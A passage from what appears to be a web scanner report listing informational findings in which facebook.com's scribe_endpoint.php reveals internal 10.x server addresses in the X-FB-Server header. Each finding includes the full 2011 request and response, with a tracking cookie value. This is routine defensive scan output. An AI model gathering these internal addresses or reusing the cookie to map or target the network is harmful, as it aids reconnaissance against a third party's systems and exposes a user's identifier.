GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1361%2C%22baseline_elapsed%22%3A1354%7D&asyncSignal=7368 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2cdefafbc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffdc432e5%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.42.225.39
X-Cnection: close
Date: Thu, 16 Jun 2011 14:08:56 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.458. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.55.60

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1545%2C%22baseline_elapsed%22%3A1545%7D&asyncSignal=842 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.55.60
X-Cnection: close
Date: Thu, 16 Jun 2011 12:15:10 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.459. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.4.31

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1789%2C%22baseline_elapsed%22%3A2126%7D&asyncSignal=2432 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.55.4.31
X-Cnection: close
Date: Thu, 16 Jun 2011 18:11:55 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.460. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.51.38

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A2143%2C%22baseline_elapsed%22%3A2143%7D&asyncSignal=3837 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.51.38
X-Cnection: close
Date: Thu, 16 Jun 2011 17:30:30 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.461. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.178.48

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1662%2C%22baseline_elapsed%22%3A1662%7D&asyncSignal=2014 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.178.48
X-Cnection: close
Date: Thu, 16 Jun 2011 11:22:32 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.462. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.143.38

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1419%2C%22baseline_elapsed%22%3A1419%7D&asyncSignal=9931 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.143.38
X-Cnection: close
Date: Thu, 16 Jun 2011 17:09:48 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.463. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.218.54

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1724%2C%22baseline_elapsed%22%3A1724%7D&asyncSignal=1165 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.218.54
X-Cnection: close
Date: Thu, 16 Jun 2011 19:08:58 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.464. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.48.48

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1367%2C%22baseline_elapsed%22%3A1368%7D&asyncSignal=5071 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17499c92c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff96bb174%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.48.48
X-Cnection: close
Date: Thu, 16 Jun 2011 14:50:15 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.465. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.82.36

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1539%2C%22baseline_elapsed%22%3A1519%7D&asyncSignal=1166 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.82.36
X-Cnection: close
Date: Thu, 16 Jun 2011 14:24:21 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.466. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.212.45

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1315%2C%22baseline_elapsed%22%3A1299%7D&asyncSignal=2036 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3fc8ffa4c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2e1211308%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.212.45
X-Cnection: close
Date: Thu, 16 Jun 2011 14:29:34 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.467. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.106.43

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1239%2C%22baseline_elapsed%22%3A1812%7D&asyncSignal=5367 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ebf3bf14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a9bfff6%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.106.43
X-Cnection: close
Date: Thu, 16 Jun 2011 15:52:13 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.468. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.96.40

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A980%2C%22baseline_elapsed%22%3A2145%7D&asyncSignal=88 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cc2374ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.96.40
X-Cnection: close
Date: Thu, 16 Jun 2011 13:17:22 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.469. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.195.39

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1773%2C%22baseline_elapsed%22%3A1764%7D&asyncSignal=4085 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df302381a14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1aa8c6f18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.195.39
X-Cnection: close
Date: Thu, 16 Jun 2011 14:45:04 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.470. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.164.32

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A2303%2C%22baseline_elapsed%22%3A2266%7D&asyncSignal=1209 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.164.32
X-Cnection: close
Date: Thu, 16 Jun 2011 17:04:37 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.471. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.24.35

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1520%2C%22baseline_elapsed%22%3A1520%7D&asyncSignal=7961 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.55.24.35
X-Cnection: close
Date: Thu, 16 Jun 2011 15:00:32 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.472. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.124.24

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A604%2C%22baseline_elapsed%22%3A604%7D&asyncSignal=777 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12a6809bc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2824c430%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.124.24
X-Cnection: close
Date: Thu, 16 Jun 2011 13:32:45 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.473. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.150.73

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1694%2C%22baseline_elapsed%22%3A373%7D&asyncSignal=8838 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df407899f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff324587f18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
